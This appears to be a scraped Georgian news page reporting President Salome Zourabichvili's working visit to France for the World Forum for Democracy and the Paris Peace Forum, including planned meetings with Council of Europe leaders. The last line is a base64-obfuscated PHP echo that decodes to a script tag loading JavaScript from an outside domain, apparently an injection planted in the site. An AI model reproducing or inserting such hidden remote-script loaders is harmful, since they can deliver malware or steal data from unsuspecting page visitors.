celsiusi
ავერსი საქკაბელი
საქართველოს პრეზიდენტი სალომე ზურაბიშვილი სამუშაო ვიზიტით საფრანგეთს ეწვია. პრეზიდენტის პრესსამსახურის ინფორმაციით, მაღალი რანგის შეხვედრები სტრასბურგსა და პარიზში გაიმართება, სადაც პრეზიდენტი მონაწილეობას მიიღებს „დემოკრატიის მსოფლიო ფორუმსა“ და „პარიზის მშვიდობის ფორუმში“.
 
„დემოკრატიის მსოფლიო ფორუმი“ ყოველწლიურად ევროპის საბჭოსა და საფრანგეთის მთავრობის პატრონაჟით ტარდება.
 
დემოკრატიის მეათე საიუბილეო ფორუმის მიზანს დემოკრატიის დაღმასვლის ძირითადი ფაქტორების გამოვლენა და ამ საკითხის გადაჭრისთვის შესაბამისი გზების მოძიება წარმოადგენს.
 
პრეზიდენტის პრესსამსახურის ცნობით, საფრანგეთში სამუშაო ვიზიტის ფარგლებში, დაგეგმილია საქართველოს პრეზიდენტის შეხვედრები ევროპის საბჭოს გენერალურ მდივან მარია პეიჩინოვიჩ ბურიჩთან და ევროპის საბჭოს საპარლამენტო ასამბლეის პრეზიდენტ ტინი კოქსთან.
 
დემოკრატიის ფორუმის ფარგლებში, სალომე ზურაბიშვილი ისლანდიის პრემიერ-მინისტრ კატრინ იაკობსდოტირს შეხვდება.
 
11 ნოემბერს საქართველოს პრეზიდენტი, მსოფლიოს ლიდერებთან ერთად, მონაწილეობას მიიღებს „პარიზის მშვიდობის ფორუმში“, რომელიც საფრანგეთის დედაქალაქში მეხუთედ ჩატარდება. წლევანდელი ფორუმი ფოკუსირებული იქნება მულტიკრიზისისა და მსოფლიო დესტრუქციული პოლარიზაციის თავიდან აცილებაზე.
 
ფორუმზე სიტყვით გამოვლენ: საფრანგეთის რესპუბლიკის პრეზიდენტი ემანუელ მაკრონი, UNESCO-ს გენერალური დირექტორი ოდრე აზულე, წითელი ჯვრისა და წითელი ნახევარმთვარის პრეზიდენტი მირიანა სპოლიარიჩ ეგერი.
278
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");